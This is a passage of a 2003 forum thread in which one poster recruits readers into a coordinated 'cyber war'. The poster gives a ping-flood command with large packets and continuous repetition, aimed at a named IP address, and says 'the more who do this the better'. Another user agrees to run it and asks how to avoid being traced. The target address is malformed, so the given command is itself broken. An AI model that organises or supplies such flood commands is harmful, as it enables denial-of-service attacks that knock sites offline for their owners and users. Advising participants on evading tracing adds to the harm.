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To: freedomlover
Anyone can participate.

Obtain a DOS Command prompt "C:\"

Type "ping -t -s 1 -l 65500 213.30.280.218" (without the quotations).

When you want to stop it type "Control C" (without the quotations).

While the site is down, you will be getting "Request timed out" messages. that's OK, just let it run.

The more who do this the better.
98 posted on 03/27/2003 12:08:32 PM PST by Search4Truth (Cyber War, it's not just for hackers anymore.)
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To: freedomlover
ping -t -s 1 -l 65500 213.30.280.218

Make sure that there is a space between each parameter
107 posted on 03/27/2003 12:18:13 PM PST by Search4Truth (Cyber War, it's not just for hackers anymore.)
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To: Search4Truth
Anyone can participate.

Obtain a DOS Command prompt "C:\"

Type "ping -t -s 1 -l 65500 213.30.280.218" (without the quotations).

When you want to stop it type "Control C" (without the quotations).

While the site is down, you will be getting "Request timed out" messages. that's OK, just let it run.

The more who do this the better.

Thanks - although I have not executed a DOS command since Windoze 3.1, I will try it on XP tonite. Is there any way for them to track the ping source? I am behind a firewall provided by my 2Wire HomePortal.

112 posted on 03/27/2003 12:22:06 PM PST by freedomlover
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